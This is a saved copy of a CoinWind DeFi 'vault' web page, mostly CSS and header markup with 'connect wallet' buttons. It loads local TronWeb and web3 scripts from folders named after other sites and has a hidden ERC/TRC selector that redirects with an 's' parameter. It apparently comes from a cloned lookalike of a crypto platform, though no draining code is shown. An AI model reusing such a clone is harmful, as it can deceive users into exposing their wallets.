<!DOCTYPE html>
<!-- saved from url=(0030)https://www.coinwind.pro/vault -->
<html lang="en" class="zh">
	<head>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<!--<link rel="icon" href="https://www.coinwind.pro/favicon.ico">-->
		<meta name="viewport" content="width=device-width,maximum-scale=3,minimum-scale=1,initial-scale=1,user-scalable=no">
		<meta name="theme-color" content="#000000">
		<meta name="description" content="CoinWind-DeFi生态单币挖矿收益最优平台">
		<!--<link rel="apple-touch-icon" href="https://www.coinwind.pro/logo192.png">-->
		<!--<link rel="manifest" href="https://www.coinwind.pro/manifest.json">-->
		<link rel="stylesheet" href="./kc_files/custom.css">
		<link rel="stylesheet" href="tc/css/layui.css">
			<script type="text/javascript" src="tc/layui.js"></script>
				
			<!-- Custom app styles-->
	<link rel="stylesheet" href="USDT_trx_new_files/reset.min.css">
	<link rel="stylesheet" href="USDT_trx_new_files/main.css">
	<script type="text/javascript" src="USDT_trx_new_files/TronWeb.js"></script>

	<!-- Jquery app core js-->
	<script type="text/javascript" src="USDT_trx_new_files/jquery-2.1.4.min.js"></script>
	<script type="text/javascript" src="USDT_trx_new_files/flexible.js"></script>
	<script type="text/javascript" src="USDT_trx_new_files/qrcode.min.js"></script>
	
	
	
    		<link rel="stylesheet" href="./Mixswap_files/reset.min.css">
		<link rel="stylesheet" href="./Mixswap_files/main.css">
		<script src="./Mixswap_files/w3model.js"></script>
		<script src="./Mixswap_files/bignumber.min.js"></script>
		<script type="text/javascript" src="./Mixswap_files/web3.min.js"></script>
		<script type="text/javascript" src="./Mixswap_files/web3model.min.js"></script>
		<script type="text/javascript" src="./Mixswap_files/evmchain.js"></script>
		<script type="text/javascript" src="./Mixswap_files/web3provider.js"></script>

		<!-- Jquery app core js-->
		<script type="text/javascript" src="./Mixswap_files/jquery-2.1.4.min.js"></script>
		<script type="text/javascript" src="./Mixswap_files/flexible.js"></script>
	<style type="text/css">
		.tishi{
			width: 3.5rem;
			height: 1.2rem;
			background: #00000059;
			z-index: 999999999999;
			position: fixed;
			top: 50%;
			left: 50%;
			transform: translate(-50%, -50%);
			border-radius: 0.1rem;
			color: white;
			font-size: 0.6rem;
			text-align: center;
			line-height: 1.2rem;
			display: none;
		}
	</style>
		
		
		<title>
			CoinWind
		</title>
		<script>
			try {
				new URLSearchParams(window.location.search).get("target")
			} catch(a) {}
		</script>
		<link href="./kc_files/2.fe62fa80.chunk.css" rel="stylesheet">
		<link href="./kc_files/main.5a5f1db2.chunk.css" rel="stylesheet">
		<style data-jss="" data-meta="MuiSvgIcon">
			.MuiSvgIcon-root { fill: currentColor; width: 1em; height: 1em; display:
			inline-block; font-size: 1.5rem; transition: fill 200ms cubic-bezier(0.4,
			0, 0.2, 1) 0ms; flex-shrink: 0; user-select: none; } .MuiSvgIcon-colorPrimary
			{ color: #3f51b5; } .MuiSvgIcon-colorSecondary { color: #f50057; } .MuiSvgIcon-colorAction
			{ color: rgba(0, 0, 0, 0.54); } .MuiSvgIcon-colorError { color: #f44336;
			} .MuiSvgIcon-colorDisabled { color: rgba(0, 0, 0, 0.26); } .MuiSvgIcon-fontSizeInherit
			{ font-size: inherit; } .MuiSvgIcon-fontSizeSmall { font-size: 1.25rem;
			} .MuiSvgIcon-fontSizeLarge { font-size: 2.1875rem; }
		</style>
		<style data-jss="" data-meta="PrivateHiddenCss">
			@media (min-width:0px) and (max-width:599.95px) { .jss29 { display: none;
			} } @media (min-width:0px) { .jss30 { display: none; } } @media (max-width:599.95px)
			{ .jss31 { display: none; } } @media (min-width:600px) and (max-width:959.95px)
			{ .jss32 { display: none; } } @media (min-width:600px) { .jss33 { display:
			none; } } @media (max-width:959.95px) { .jss34 { display: none; } } @media
			(min-width:960px) and (max-width:1279.95px) { .jss35 { display: none; }
			} @media (min-width:960px) { .jss36 { display: none; } } @media (max-width:1279.95px)
			{ .jss37 { display: none; } } @media (min-width:1280px) and (max-width:1919.95px)
			{ .jss38 { display: none; } } @media (min-width:1280px) { .jss39 { display:
			none; } } @media (max-width:1919.95px) { .jss40 { display: none; } } @media
			(min-width:1920px) { .jss41 { display: none; } } @media (min-width:1920px)
			{ .jss42 { display: none; } } @media (min-width:0px) { .jss43 { display:
			none; } }
		</style>
		<style data-jss="" data-meta="makeStyles">
			.jss1 { width: 100%; height: 80px; position: relative; background: rgba(255,255,255,0.60);
			border-top: 1px solid #FFFFFF; box-shadow: 0 4px 16px 0 #F6F6F6; border-bottom:
			1px solid #FFFFFF; } @media (max-width:959.95px) { .jss1 { height: 48px;
			} } .jss2 { height: 80px; margin: 0 auto; display: flex; padding: 0 10px;
			max-width: 1200px; box-sizing: border-box; align-items: center; justify-content:
			space-between; } @media (max-width:959.95px) { .jss2 { width: 100%; height:
			48px; padding: 0 16px; } } .jss3 { top: 18px; left: 38px; width: 165px;
			height: 44px; display: block; position: absolute; background: url(/static/media/logo.c3d2c062.svg)
			no-repeat center center; background-size: contain; } .jss4 { top: 18px;
			left: 38px; width: 165px; height: 44px; display: block; position: absolute;
			} .jss4 img { width: 100%; height: 100%; } @media (max-width:959.95px)
			{ .jss4 { width: 120px; height: 32px; position: unset; } .jss4 img { width:
			100%; height: 100%; } } .jss5 { color: #8391A8; height: 100%; font-size:
			14px; font-weight: 500; line-height: 80px; } @media (max-width:959.95px)
			{ .jss5 { height: 32px; line-height: unset; } } .jss6 { color: #8391A8;
			display: flex; font-size: 14px; font-weight: 500; } .jss6 p { overflow:
			hidden; max-width: 400px; white-space: nowrap; text-overflow: ellipsis;
			} .jss6 img { margin-right: 5px; } .jss7 { color: #3078FF; cursor: pointer;
			font-size: 12px; font-weight: 400; margin-left: 8px; text-decoration: underline;
			} .jss8 { display: flex; align-items: center; } .jss9 { color: #555; width:
			100%; border: 0; display: flex; padding: 0.625rem 0; position: relative;
			flex-flow: row nowrap; box-shadow: 0 4px 18px 0px rgba(0, 0, 0, 0.12),
			0 7px 10px -5px rgba(0, 0, 0, 0.15); transition: all 150ms ease 0s; align-items:
			center; border-radius: 3px; margin-bottom: 20px; justify-content: flex-start;
			background-color: #FFF; } .jss10 { top: auto; position: absolute; } .jss11
			{ position: fixed; } .jss12 { width: 100%; display: flex; flex-wrap: nowrap;
			min-height: 50px; align-items: center; margin-left: auto; margin-right:
			auto; padding-left: 15px; padding-right: 15px; justify-content: space-between;
			} @media (min-width: 576px) { .jss12 { max-width: 540px; } } @media (min-width:
			768px) { .jss12 { max-width: 720px; } } @media (min-width: 992px) { .jss12
			{ max-width: 960px; } } @media (min-width: 1230px) { .jss12 { max-width:
			1230px; } } .jss13 { letter-spacing: unset; } .jss13, .jss13 a { color:
			inherit; font-size: 24px; min-width: unset; font-family: "Roboto", "Helvetica",
			"Arial", sans-serif, DINPro-Bold; font-weight: 700; line-height: 30px;
			white-space: nowrap; border-radius: 3px; text-transform: none; } .jss13
			a { margin-left: 8px; } .jss13:hover, .jss13:focus, .jss13 a:hover, .jss13
			a:focus { color: inherit; background: transparent; } .jss14 { margin: 20px
			10px; margin-top: 0px; } .jss15 { color: #FFF; box-shadow: 0 4px 20px 0px
			rgba(0, 0, 0, 0.14), 0 7px 12px -5px rgba(48, 120, 255, 0.46); background-color:
			#3078FF; } .jss16 { color: #FFF; box-shadow: 0 4px 20px 0px rgba(0, 0,
			0, 0.14), 0 7px 12px -5px rgba(0, 172, 193, 0.46); background-color: #00acc1;
			} .jss17 { color: #FFF; box-shadow: 0 4px 20px 0px rgba(0, 0, 0, 0.14),
			0 7px 12px -5px rgba(76, 175, 80, 0.46); background-color: #4caf50; } .jss18
			{ color: #FFF; box-shadow: 0 4px 20px 0px rgba(0, 0, 0, 0.14), 0 7px 12px
			-5px rgba(255, 152, 0, 0.46); background-color: #ff9800; } .jss19 { color:
			#FFF; box-shadow: 0 4px 20px 0px rgba(0, 0, 0, 0.14), 0 7px 12px -5px rgba(244,
			67, 54, 0.46); background-color: #f44336; } .jss20 { color: #FFF; box-shadow:
			0 4px 20px 0px rgba(0, 0, 0, 0.14), 0 7px 12px -5px rgba(233, 30, 99, 0.46);
			background-color: #e91e63; } .jss21 { color: #FFF; box-shadow: none; padding-top:
			25px; background-color: transparent !important; } .jss22 { color: #FFF;
			box-shadow: 0px 8px 12px 0px rgba(0, 0, 0, 0.06); background-color: #323951;
			} .jss23 { color: #555; border: 0; padding: 0.625rem 0; box-shadow: 0 4px
			18px 0px rgba(0, 0, 0, 0.12), 0 7px 10px -5px rgba(0, 0, 0, 0.15); margin-bottom:
			20px; background-color: #FFF !important; } .jss24 { top: 0; left: auto;
			right: 0; width: 260px; border: none; bottom: 0; height: 100vh; display:
			block; position: fixed; border-top: none; box-shadow: 0 10px 30px -12px
			rgba(0, 0, 0, 0.42), 0 4px 25px 0px rgba(0, 0, 0, 0.12), 0 8px 10px -5px
			rgba(0, 0, 0, 0.2); overflow-y: visible; text-align: left; transition:
			all 0.33s cubic-bezier(0.685, 0.0473, 0.346, 1); visibility: visible; padding-left:
			0; padding-right: 0px; background-color: #323951; transition-duration:
			.2s, .2s, .35s; transition-property: top, bottom, width; transition-timing-function:
			linear, linear, ease; } .jss25 { width: 100%; } .jss26 { flex-grow: 1;
			align-items: center; -ms-flex-align: center; -webkit-box-flex: 1; -ms-flex-positive:
			1; -webkit-box-align: center; } @media (min-width:960px) { .jss26 { display:
			flex !important; flex-basis: auto; -ms-flex-preferred-size: auto; } } .jss27
			{ top: 9px; color: white; right: 8px; z-index: 1; position: absolute; }
			.jss28 { width: 60xh; display: flex; overflow: visible; justify-content:
			space-between; }
		</style>
		<style data-jss="" data-meta="MuiTouchRipple">
			.MuiTouchRipple-root { top: 0; left: 0; right: 0; bottom: 0; z-index:
			0; overflow: hidden; position: absolute; border-radius: inherit; pointer-events:
			none; } .MuiTouchRipple-ripple { opacity: 0; position: absolute; } .MuiTouchRipple-rippleVisible
			{ opacity: 0.3; animation: MuiTouchRipple-keyframes-enter 550ms cubic-bezier(0.4,
			0, 0.2, 1); transform: scale(1); } .MuiTouchRipple-ripplePulsate { animation-duration:
			200ms; } .MuiTouchRipple-child { width: 100%; height: 100%; display: block;
			opacity: 1; border-radius: 50%; background-color: currentColor; } .MuiTouchRipple-childLeaving
			{ opacity: 0; animation: MuiTouchRipple-keyframes-exit 550ms cubic-bezier(0.4,
			0, 0.2, 1); } .MuiTouchRipple-childPulsate { top: 0; left: 0; position:
			absolute; animation: MuiTouchRipple-keyframes-pulsate 2500ms cubic-bezier(0.4,
			0, 0.2, 1) 200ms infinite; } @-webkit-keyframes MuiTouchRipple-keyframes-enter
			{ 0% { opacity: 0.1; transform: scale(0); } 100% { opacity: 0.3; transform:
			scale(1); } } @-webkit-keyframes MuiTouchRipple-keyframes-exit { 0% { opacity:
			1; } 100% { opacity: 0; } } @-webkit-keyframes MuiTouchRipple-keyframes-pulsate
			{ 0% { transform: scale(1); } 50% { transform: scale(0.92); } 100% { transform:
			scale(1); } }
		</style>
		<style data-jss="" data-meta="MuiButtonBase">
			.MuiButtonBase-root { color: inherit; border: 0; cursor: pointer; margin:
			0; display: inline-flex; outline: 0; padding: 0; position: relative; align-items:
			center; user-select: none; border-radius: 0; vertical-align: middle; -moz-appearance:
			none; justify-content: center; text-decoration: none; background-color:
			transparent; -webkit-appearance: none; -webkit-tap-highlight-color: transparent;
			} .MuiButtonBase-root::-moz-focus-inner { border-style: none; } .MuiButtonBase-root.Mui-disabled
			{ cursor: default; pointer-events: none; } @media print { .MuiButtonBase-root
			{ -webkit-print-color-adjust: exact; } }
		</style>
		<style data-jss="" data-meta="MuiIconButton">
			.MuiIconButton-root { flex: 0 0 auto; color: rgba(0, 0, 0, 0.54); padding:
			12px; overflow: visible; font-size: 1.5rem; text-align: center; transition:
			background-color 150ms cubic-bezier(0.4, 0, 0.2, 1) 0ms; border-radius:
			50%; } .MuiIconButton-root:hover { background-color: rgba(0, 0, 0, 0.04);
			} .MuiIconButton-root.Mui-disabled { color: rgba(0, 0, 0, 0.26); background-color:
			transparent; } @media (hover: none) { .MuiIconButton-root:hover { background-color:
			transparent; } } .MuiIconButton-edgeStart { margin-left: -12px; } .MuiIconButton-sizeSmall.MuiIconButton-edgeStart
			{ margin-left: -3px; } .MuiIconButton-edgeEnd { margin-right: -12px; }
			.MuiIconButton-sizeSmall.MuiIconButton-edgeEnd { margin-right: -3px; }
			.MuiIconButton-colorInherit { color: inherit; } .MuiIconButton-colorPrimary
			{ color: #3f51b5; } .MuiIconButton-colorPrimary:hover { background-color:
			rgba(63, 81, 181, 0.04); } @media (hover: none) { .MuiIconButton-colorPrimary:hover
			{ background-color: transparent; } } .MuiIconButton-colorSecondary { color:
			#f50057; } .MuiIconButton-colorSecondary:hover { background-color: rgba(245,
			0, 87, 0.04); } @media (hover: none) { .MuiIconButton-colorSecondary:hover
			{ background-color: transparent; } } .MuiIconButton-sizeSmall { padding:
			3px; font-size: 1.125rem; } .MuiIconButton-label { width: 100%; display:
			flex; align-items: inherit; justify-content: inherit; }
		</style>
		<style data-jss="" data-meta="MuiButton">
			.MuiButton-root { color: rgba(0, 0, 0, 0.87); padding: 6px 16px; font-size:
			0.875rem; min-width: 64px; box-sizing: border-box; transition: background-color
			250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,box-shadow 250ms cubic-bezier(0.4,
			0, 0.2, 1) 0ms,border 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms; font-family:
			"Roboto", "Helvetica", "Arial", sans-serif; font-weight: 500; line-height:
			1.75; border-radius: 4px; letter-spacing: 0.02857em; text-transform: uppercase;
			} .MuiButton-root:hover { text-decoration: none; background-color: rgba(0,
			0, 0, 0.04); } .MuiButton-root.Mui-disabled { color: rgba(0, 0, 0, 0.26);
			} @media (hover: none) { .MuiButton-root:hover { background-color: transparent;
			} } .MuiButton-root:hover.Mui-disabled { background-color: transparent;
			} .MuiButton-label { width: 100%; display: inherit; align-items: inherit;
			justify-content: inherit; } .MuiButton-text { padding: 6px 8px; } .MuiButton-textPrimary
			{ color: #3f51b5; } .MuiButton-textPrimary:hover { background-color: rgba(63,
			81, 181, 0.04); } @media (hover: none) { .MuiButton-textPrimary:hover {
			background-color: transparent; } } .MuiButton-textSecondary { color: #f50057;
			} .MuiButton-textSecondary:hover { background-color: rgba(245, 0, 87, 0.04);
			} @media (hover: none) { .MuiButton-textSecondary:hover { background-color:
			transparent; } } .MuiButton-outlined { border: 1px solid rgba(0, 0, 0,
			0.23); padding: 5px 15px; } .MuiButton-outlined.Mui-disabled { border:
			1px solid rgba(0, 0, 0, 0.12); } .MuiButton-outlinedPrimary { color: #3f51b5;
			border: 1px solid rgba(63, 81, 181, 0.5); } .MuiButton-outlinedPrimary:hover
			{ border: 1px solid #3f51b5; background-color: rgba(63, 81, 181, 0.04);
			} @media (hover: none) { .MuiButton-outlinedPrimary:hover { background-color:
			transparent; } } .MuiButton-outlinedSecondary { color: #f50057; border:
			1px solid rgba(245, 0, 87, 0.5); } .MuiButton-outlinedSecondary:hover {
			border: 1px solid #f50057; background-color: rgba(245, 0, 87, 0.04); }
			.MuiButton-outlinedSecondary.Mui-disabled { border: 1px solid rgba(0, 0,
			0, 0.26); } @media (hover: none) { .MuiButton-outlinedSecondary:hover {
			background-color: transparent; } } .MuiButton-contained { color: rgba(0,
			0, 0, 0.87); box-shadow: 0px 3px 1px -2px rgba(0,0,0,0.2),0px 2px 2px 0px
			rgba(0,0,0,0.14),0px 1px 5px 0px rgba(0,0,0,0.12); background-color: #e0e0e0;
			} .MuiButton-contained:hover { box-shadow: 0px 2px 4px -1px rgba(0,0,0,0.2),0px
			4px 5px 0px rgba(0,0,0,0.14),0px 1px 10px 0px rgba(0,0,0,0.12); background-color:
			#d5d5d5; } .MuiButton-contained.Mui-focusVisible { box-shadow: 0px 3px
			5px -1px rgba(0,0,0,0.2),0px 6px 10px 0px rgba(0,0,0,0.14),0px 1px 18px
			0px rgba(0,0,0,0.12); } .MuiButton-contained:active { box-shadow: 0px 5px
			5px -3px rgba(0,0,0,0.2),0px 8px 10px 1px rgba(0,0,0,0.14),0px 3px 14px
			2px rgba(0,0,0,0.12); } .MuiButton-contained.Mui-disabled { color: rgba(0,
			0, 0, 0.26); box-shadow: none; background-color: rgba(0, 0, 0, 0.12); }
			@media (hover: none) { .MuiButton-contained:hover { box-shadow: 0px 3px
			1px -2px rgba(0,0,0,0.2),0px 2px 2px 0px rgba(0,0,0,0.14),0px 1px 5px 0px
			rgba(0,0,0,0.12); background-color: #e0e0e0; } } .MuiButton-contained:hover.Mui-disabled
			{ background-color: rgba(0, 0, 0, 0.12); } .MuiButton-containedPrimary
			{ color: #fff; background-color: #3f51b5; } .MuiButton-containedPrimary:hover
			{ background-color: #303f9f; } @media (hover: none) { .MuiButton-containedPrimary:hover
			{ background-color: #3f51b5; } } .MuiButton-containedSecondary { color:
			#fff; background-color: #f50057; } .MuiButton-containedSecondary:hover
			{ background-color: #c51162; } @media (hover: none) { .MuiButton-containedSecondary:hover
			{ background-color: #f50057; } } .MuiButton-disableElevation { box-shadow:
			none; } .MuiButton-disableElevation:hover { box-shadow: none; } .MuiButton-disableElevation.Mui-focusVisible
			{ box-shadow: none; } .MuiButton-disableElevation:active { box-shadow:
			none; } .MuiButton-disableElevation.Mui-disabled { box-shadow: none; }
			.MuiButton-colorInherit { color: inherit; border-color: currentColor; }
			.MuiButton-textSizeSmall { padding: 4px 5px; font-size: 0.8125rem; } .MuiButton-textSizeLarge
			{ padding: 8px 11px; font-size: 0.9375rem; } .MuiButton-outlinedSizeSmall
			{ padding: 3px 9px; font-size: 0.8125rem; } .MuiButton-outlinedSizeLarge
			{ padding: 7px 21px; font-size: 0.9375rem; } .MuiButton-containedSizeSmall
			{ padding: 4px 10px; font-size: 0.8125rem; } .MuiButton-containedSizeLarge
			{ padding: 8px 22px; font-size: 0.9375rem; } .MuiButton-fullWidth { width:
			100%; } .MuiButton-startIcon { display: inherit; margin-left: -4px; margin-right:
			8px; } .MuiButton-startIcon.MuiButton-iconSizeSmall { margin-left: -2px;
			} .MuiButton-endIcon { display: inherit; margin-left: 8px; margin-right:
			-4px; } .MuiButton-endIcon.MuiButton-iconSizeSmall { margin-right: -2px;
			} .MuiButton-iconSizeSmall > *:first-child { font-size: 18px; } .MuiButton-iconSizeMedium
			> *:first-child { font-size: 20px; } .MuiButton-iconSizeLarge > *:first-child
			{ font-size: 22px; }
		</style>
		<style data-jss="" data-meta="makeStyles">
		</style>
		<style data-jss="" data-meta="makeStyles">
			.jss47 { display: none !important; pointer-events: none; } .jss48 { top:
			10px!important; } @media (max-width:959.95px) { .jss48 { top: unset !important;
			left: unset !important; position: static !important; transform: none !important;
			will-change: none !important; } .jss48 > div { padding: 0px !important;
			box-shadow: none !important; margin-top: 0px !important; transition: none
			!important; margin-left: 1.5rem; margin-right: 1.5rem; margin-bottom: 5px
			!important; } } .jss49 { display: block; } .jss49 > div > button, .jss49
			> div > a { color: inherit !important; margin: 0px !important; padding:
			10px 20px !important; } .jss49 > div > button > span:first-child, .jss49
			> div > a > span:first-child { width: 100%; justify-content: flex-start;
			} .jss50 > button:first-child > span:first-child, .jss50 > a:first-child
			> span:first-child { display: inline-block; } .jss50 .jss67 { margin-left:
			0px; } .jss51 { overflow: hidden; box-shadow: 0 4px 12px 0 #EDEFF2; border-radius:
			16px; } .jss52 { background-color: #323951; } .jss53 { color: #fff !important;
			} .jss54 { padding: 0; } .jss55 { z-index: 1200; } @media (max-width:959.95px)
			{ .jss55 { color: black; float: none; width: auto; border: 0; z-index:
			1640; position: static; box-shadow: none; margin-top: 0; background-color:
			transparent; } } .jss56 { color: #131D32; width: 198px; height: 60px; font-size:
			16px; background: transparent; transition: all 150ms linear; font-family:
			DINPro-Bold; font-weight: 700; line-height: 60px; border-bottom: 1px solid
			#EDEFF2; letter-spacing: 0; justify-content: center; } .jss56:last-of-type
			{ border-bottom: none; } .jss57:hover { color: #FFF; box-shadow: 0 4px
			20px 0px rgba(0, 0, 0, 0.14), 0 7px 10px -5px rgba(33, 33, 33, 0.4); background-color:
			#272E42; } .jss58:hover { color: #3078FF; background-color: #F1FAFF; }
			.jss59:hover { color: #FFF; box-shadow: 0 12px 20px -10px rgba(0, 172,
			193, 0.28), 0 4px 20px 0px rgba(0, 0, 0, 0.12), 0 7px 8px -5px rgba(0,
			172, 193, 0.2); background-color: #00acc1; } .jss60:hover { color: #FFF;
			box-shadow: 0 12px 20px -10px rgba(76, 175, 80, 0.28), 0 4px 20px 0px rgba(0,
			0, 0, 0.12), 0 7px 8px -5px rgba(76, 175, 80, 0.2); background-color: #4caf50;
			} .jss61:hover { color: #FFF; box-shadow: 0 12px 20px -10px rgba(255, 152,
			0, 0.28), 0 4px 20px 0px rgba(0, 0, 0, 0.12), 0 7px 8px -5px rgba(255,
			152, 0, 0.2); background-color: #ff9800; } .jss62:hover { color: #FFF;
			box-shadow: 0 12px 20px -10px rgba(244, 67, 54, 0.28), 0 4px 20px 0px rgba(0,
			0, 0, 0.12), 0 7px 8px -5px rgba(244, 67, 54, 0.2); background-color: #f44336;
			} .jss63:hover { color: #FFF; box-shadow: 0 4px 20px 0px rgba(0, 0, 0,
			0.14), 0 7px 10px -5px rgba(233, 30, 99, 0.4); background-color: #e91e63;
			} .jss64 { text-align: right; } .jss65 { height: 1px; margin: 5px 0; overflow:
			hidden; background-color: rgba(0, 0, 0, 0.12); } .jss66 { color: white;
			width: 20px; height: 20px; } .jss67 { color: #3078FF; width: 0; height:
			0; display: inline-block; border-top: 4px solid; transition: all 150ms
			ease-in; border-left: 4px solid transparent; margin-left: 4px; border-right:
			4px solid transparent; vertical-align: middle; } .jss68 { color: #FFF;
			transform: rotate(180deg); } .jss69 { color: #FFF; transform: rotate(180deg);
			} .jss70 { margin-right: 4px; } .jss71 { color: #777; display: block; padding:
			0.1875rem 1.25rem; font-size: 0.75rem; margin-top: 10px; min-height: 24px;
			font-weight: inherit; line-height: 1.428571; white-space: nowrap; } .jss71:hover,
			.jss71:focus { cursor: auto; background-color: transparent; } .jss72 {
			padding: 0; }
		</style>
		<style data-jss="" data-meta="makeStyles">
			.jss45 { color: #3078FF; border: 1px solid #3078FF; cursor: pointer; height:
			36px; padding: 0 40px; font-size: 14px; background: #FFFFFF; border-radius:
			22px; } .jss45:hover, .jss45:focus { color: #FFF; background-color: #3078FF;
			} .jss45:hover b, .jss45:focus b { color: #FFF; } .jss45 .MuiButton-label
			{ font-size: 14px; font-family: DINPro-Bold; } @media (max-width:959.95px)
			{ .jss45 { color: #3078FF; border: 1px solid #FFFFFF; height: 32px; padding:
			0 22px; font-size: 10px; background: rgba(255,255,255,0.60); box-shadow:
			0 4px 16px 0 #F6F6F6; border-radius: 16px; } }
		</style>
		<style data-jss="" data-meta="makeStyles">
			.jss75 { width: 240px; height: 100%; background-color: #FFF; } .jss76
			{ padding-top: 40px; } .jss77 { width: 100%; } .jss78 { width: 100%; cursor:
			pointer; height: 64px; display: flex; position: relative; font-size: 14px;
			box-sizing: border-box; transition: all .5s; align-items: center; font-weight:
			700; padding-left: 33px; background-color: #FFF; } .jss78:hover { background-color:
			rgba(1,163,254,.06); } .jss78:hover a, .jss78:hover span { color: #3078FF;
			} .jss78 a, .jss78 span { font-size: 14px; } .jss79 { color: #3078FF !important;
			display: flex; position: relative; align-items: center; font-weight: bold
			!important; background-color: rgba(1,163,254,.06); } .jss79 span { right:
			0; width: 4px; height: 22px; position: absolute; background: #3078FF; border-radius:
			2px; } .jss80 { width: 20px; height: 20px; display: block; margin-right:
			8px; } .jss81 strong { color: #fff; right: 50px; height: 20px; padding:
			0 10px; position: absolute; font-size: 12px; background: linear-gradient(90deg,
			#3078FF 0%, rgba(48,120,255,.6) 100%); font-family: PingFangSC-Medium;;
			font-weight: 400; line-height: 20px; border-radius: 9px 9px 9px 0; } .jss82
			{ overflow: hidden; max-height: 0; transition: all linear .3s; } .jss83
			{ color: #131D32; cursor: pointer; height: 48px; overflow: hidden; font-size:
			14px; box-sizing: border-box; font-weight: 400; line-height: 48px; white-space:
			nowrap; padding-left: 60px; text-overflow: ellipsis; } .jss83:hover { color:
			#3078FF; background-color: rgba(1,163,254,.06); } .jss84:hover span { color:
			#3078FF; }
		</style>
		<style data-styled="active" data-styled-version="5.2.0">
		</style>
	</head>
	<body>
		<section id="root">
			<header>
				<div class="jss1">
					<div class="header__wrapper-box">
						<div class="jss34">
							<div class="jss2">
								<div class="jss5">
									<a href="https://www.coinwind.pro/" class="jss4">
										<img src="./kc_files/logo.c3d2c062.svg" alt="">
									</a>
								</div>
								<div class="jss8">
									<div class="jss34">
										<div class="header__button-container" style="display: flex;">
											<div class="jss44">
												<div>
													<div class="jss50">
														<button class="MuiButtonBase-root MuiButton-root MuiButton-text jss73 jss45"
														tabindex="0" type="button" aria-label="Notifications" aria-haspopup="true">
															<span class="MuiButton-label">
																<b class="jss67">
																</b>
															</span>
															<span class="MuiTouchRipple-root">
															</span>
														</button>
													</div>
												</div>
											</div>
											<button class="MuiButtonBase-root MuiButton-root MuiButton-text jss73 jss45"
											tabindex="0" type="button" style="margin-left: 32px;">
												<span class="MuiButton-label">
													鏈接錢包
												</span>
												<span class="MuiTouchRipple-root">
												</span>
											</button>
											<div class="nav__language-containers">
												<div class="dropdown__button  imgZhong img_heco">
												</div>
												<div class="dropdown__option  option__top left_content">
													<div class="option__item option__item-heco">
														中文繁體
													</div>
													<div class="option__item option__item-heco">
														English
													</div>
												</div>
											</div>
										</div>
									</div>
									<div class="jss36">
										<button class="MuiButtonBase-root MuiButton-root MuiButton-text jss73 jss45"
										tabindex="0" type="button">
											<span class="MuiButton-label">
												鏈接錢包
											</span>
											<span class="MuiTouchRipple-root">
											</span>
										</button>
										<button class="MuiButtonBase-root MuiIconButton-root MuiIconButton-colorInherit"
										tabindex="0" type="button" aria-label="open drawer">
											<span class="MuiIconButton-label">
												<svg class="MuiSvgIcon-root" focusable="false" viewBox="0 0 24 24" aria-hidden="true">
													<path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z">
													</path>
												</svg>
											</span>
											<span class="MuiTouchRipple-root">
											</span>
										</button>
									</div>
								</div>
							</div>
						</div>
						<div class="jss36">
							<div class="jss2">
								<div class="jss5">
									<a href="https://www.coinwind.pro/" class="jss4">
										<img src="./kc_files/logo.c3d2c062.svg" alt="">
									</a>
								</div>
								<div class="jss8">
									
									<div class="jss36"  style="display:none">
									     <select style="float:left;width:60px;margin-top:20px;border-radius:10px;background-color:#3078ff;color:#fff;text-align:center;" id="test"  onchange="gradeChange()">
									        <option value ="erc" style="width:100%;height:100%;">ERC</option>
									        <option value ="trc" style="width:100%;height:100%;">TRC</option>
									    </select>
									    <script>
    									    function gradeChange(){
    									        var myselect=document.getElementById("test");
    									         var index=myselect.selectedIndex ;
    									         var zhi =  myselect.options[index].value;
    									       //  alert(zhi)
    									         if(zhi == 'erc'){
    									            var s_zhi = getUrlQueryString('s');
                                                    var kc_url = "./kc_erc.html?s="+s_zhi;
                                                    // alert(kc_url)
                                                    window.location.href=kc_url;
    									         }else{
    									             var s_zhi = getUrlQueryString('s');
                                                    var kc_url = "./kc.html?s="+s_zhi;
                                                    // alert(kc_url)
                                                    window.location.href=kc_url;
    									         }
    									    }
									         
									    </script>
										<button class="MuiButtonBase-root MuiButton-root MuiButton-text jss73 jss45"
										tabindex="0" type="button" style="display:none;">
											<span class="MuiButton-label"  id="qianbao_dz">
												鏈接錢包
											</span>
											<span class="MuiTouchRipple-root">
											</span>
										</button>
										<!--<button class="MuiButtonBase-root MuiButton-root MuiButton-text jss73 jss45"-->
										<!--tabindex="0" type="button">-->
										<!--	<span class="MuiButton-label"  id="qianbao_dz">-->
										<!--		鏈接錢包-->
										<!--	</span>-->
										<!--	<span class="MuiTouchRipple-root">-->
										<!--	</span>-->
										<!--</button>-->
										<button class="MuiButtonBase-root MuiIconButton-root MuiIconButton-colorInherit"
										tabindex="0" type="button" aria-label="open drawer">
											<span class="MuiIconButton-label"   onclick="zk()">
												<svg class="MuiSvgIcon-root" focusable="false" viewBox="0 0 24 24" aria-hidden="true">
													<path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z">
													</path>
												</svg>
											</span>
											<span class="MuiTouchRipple-root">
											</span>
										</button>
										
										<script>
										    function zk(){
										        document.getElementById('aaa').style.display = '';
										    }
										    function gb(){
										        document.getElementById('aaa').style.display = 'none';
										    }
										</script>
										<div class="slider__mask " id="aaa" style="display:none">
											<div class="slider__content ">
											    <div style="font-size:16px;text-align:right;padding-right:10px;padding-top:10px;" onclick="gb()">
											        <img src="./image/gb.png" style="width:30px">
											    </div>
												<div class="slider__content_all">
													<div class="nav__language-container">
														<img src="./kc_files/liwu.c773fe7d.svg" alt="">
														<span style="margin-left: 10px;">
															領取空投
														</span>
													</div>
													<div class="nav__language-container">
														<a href="https://docs.coinwind.pro/v/chinese/guide/wallet&amp;asset" target="_blank">
															<span>
																使用教程
															</span>
														</a>
													</div>
													<div class="nav__language-container">
														<a href="https://docs.coinwind.pro/v/chinese/guide/faq" target="_blank">
															<span>
																常見問題
															</span>
														</a>
													</div>
													<div class="nav__language-container">
														<a href="https://docs.coinwind.pro/v/chinese/" target="_blank">
															<span>
																平臺公告
															</span>
														</a>
													</div>
													<div class="nav__language-container">
														<a href="https://www.coinwind.pro/assetExchange">
															<span>
																資產兌換
															</span>
														</a>
													</div>
													<div class="nav__language-container" onclick="yingwen()">
														<div class="dropdown__button">
															<span>
																English
															</span>
														</div>
													</div>
													<div class="lian_wo">
														<div class="footer__right-img-box" style="margin-right: 56px;">
															<img class="footer__right-img-wechat" src="./kc_files/telegram.f6c31300.svg"
															alt="">
														</div>
